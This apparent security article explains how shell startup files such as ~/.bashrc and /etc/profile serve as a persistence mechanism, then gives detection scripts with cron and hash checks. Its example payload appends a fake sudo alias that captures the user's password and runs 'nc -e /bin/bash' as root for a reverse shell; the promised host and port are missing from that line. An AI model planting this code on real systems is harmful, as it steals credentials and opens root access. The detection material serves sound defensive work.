While editing your .bashrc and .bash_profile is a convenient way to customize your bash environment, the same files can be used by an adversary as a persistence mechanism: anything appended to them runs every time a shell starts. The following files can be used for this persistence mechanism.
/etc/profile
/etc/bash.bashrc
~/.bashrc
~/.bash_profile
~/.profile
You can take the example malicious code below and add it to any of the files above to have a bash shell call out to <ip> and <port>.
Example Code:
```bash
<var>="<.hidden filename>"
cat << EOF > /tmp/<var>
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
    cat /tmp/<var> >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
    cat /tmp/<var> >> ~/.zshrc
fi
rm /tmp/<var>
```
This can easily be detected by checking these files for unexpected additions, or by using the following script to alert on recent changes.
Example Detection Code:
```bash
#!/bin/bash
# detect.sh: alert if one of the shell startup files listed above was changed
# in the last $MIN minutes.
MIN=30
# Only -mmin (content) and -cmin (metadata) are used: -amin would fire every
# time a shell starts and merely reads the file.
MOD=$(find /etc/profile /etc/bash.bashrc "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" \
        \( -cmin -"$MIN" -o -mmin -"$MIN" \) 2>/dev/null)
if [ -n "$MOD" ]; then
    # notify-send needs a desktop session (DISPLAY/DBUS); from cron, log instead if it is absent.
    notify-send -u critical -t 0 -i /usr/share/icons/gnome/32x32/status/dialog-warning.png \
        "Shell startup file modified: $MOD"
fi
```
Save this as detect.sh and add a cron job to run it every 30 minutes (note that `30 * * * *` would run it only once an hour, at minute 30):
```
*/30 * * * * /bin/bash /<path>/detect.sh
```
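Timestamp-based detection only sees edits within the last window and says nothing about what changed. A complementary check, added here as an example and not code from the original page, keeps a sha256 baseline of the startup files listed above, reports any file whose hash differs (modified, newly created or deleted), and greps for the indicators the payload above leaves behind (an alias shadowing sudo, a password piped into `sudo -S`, `nc -e`). The BASELINE path is an assumption chosen for this example.

```bash
#!/bin/bash
# Added example (not from the original page): baseline-hash check of the
# shell startup files listed on this page.
# Assumption: BASELINE is a path chosen for this example; override it via env.
PROFILE_FILES="/etc/profile /etc/bash.bashrc $HOME/.bashrc $HOME/.bash_profile $HOME/.profile"
BASELINE="${BASELINE:-$HOME/.config/profile-baseline.sha256}"

# Print "<sha256>  <path>"; fall back to shasum where sha256sum is absent.
hash_file() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi
}

# Record the current hash of every startup file that exists.
baseline_init() {
  mkdir -p "$(dirname "$BASELINE")"
  : > "$BASELINE"
  for f in $PROFILE_FILES; do            # unquoted on purpose: split on spaces
    if [ -f "$f" ]; then hash_file "$f" >> "$BASELINE"; fi
  done
  return 0
}

# Compare each startup file with the baseline. Prints a CHANGED line for every
# file that was modified, created or removed; returns 1 if anything changed.
baseline_check() {
  if [ ! -f "$BASELINE" ]; then echo "no baseline at $BASELINE; run init first" >&2; return 2; fi
  rc=0
  for f in $PROFILE_FILES; do
    old=$(awk -v p="$f" '$2 == p { print $1 }' "$BASELINE")
    cur=""
    if [ -f "$f" ]; then cur=$(hash_file "$f" | awk '{ print $1 }'); fi
    if [ "$cur" != "$old" ]; then
      echo "CHANGED: $f"
      rc=1
    fi
  done
  return $rc
}

# Flag the indicators left by the example payload above: an alias that
# shadows sudo, a password fed to sudo -S, or netcat spawning a shell.
suspicious_lines() {
  grep -nE "alias sudo=|sudo -S|nc -e" "$@" 2>/dev/null
}

case "${1:-}" in
  init)  baseline_init ;;
  check) baseline_check; suspicious_lines $PROFILE_FILES ;;
esac
```

Run `profile-watch.sh init` once after verifying the files are clean, then schedule `profile-watch.sh check` from cron (for example `*/30 * * * *`); cron mails or logs the CHANGED lines and matched indicators, so no desktop notification is needed.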